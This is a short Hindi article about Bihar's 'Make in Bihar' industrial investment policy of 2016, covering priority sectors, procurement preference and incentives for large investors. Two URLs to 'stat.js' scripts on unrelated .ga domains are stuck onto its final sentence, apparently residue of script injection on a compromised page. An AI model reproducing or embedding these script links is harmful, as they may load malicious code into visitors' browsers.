बिहार सरकार की नई नीति “ मेक इन बिहार”. इस नीति के तहत बिहार सरकार औद्योगिक निवेश प्रोत्साहन नीति 2016 संबोधित करते हुए बिहार में निवेश करने वालों के लिए नए रास्ते खोले हैं।
इसके तहत ऑटोमोबाइल, कृषि, आईटी क्षेत्र के साथ-साथ रक्षा संबंधी उपकरणों की उत्पादन एवं इकाईयों को प्राथमिकता सूची में शामिल किया गया है। वही सरकारी खरीद में बिहार में निर्मित उत्पादों को ही प्राथमिकता मिलेगी। इससे बिहार के युवाओं को रोजगार का अवसर प्राप्त होगा। मेक इन बिहार पर फोकस करने के साथ-साथ देश की औद्योगिक नीति मेक इन इंडिया के लिए भी मददगार साबित होगी।
रक्षा क्षेत्र की उत्पादन इकाइयों को भी प्राथमिकता सूची में रखा गया है सामरिक निवेश परियोजनाओं के लिए प्रोत्साहन पैकेज की व्यवस्था की गई है इसमें शामिल है जो प्लांट एवं मशीनरी में 500 करोड़ का निवेश करेंगी, या 500 बिहारी श्रमिकों को रोजगार देंगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms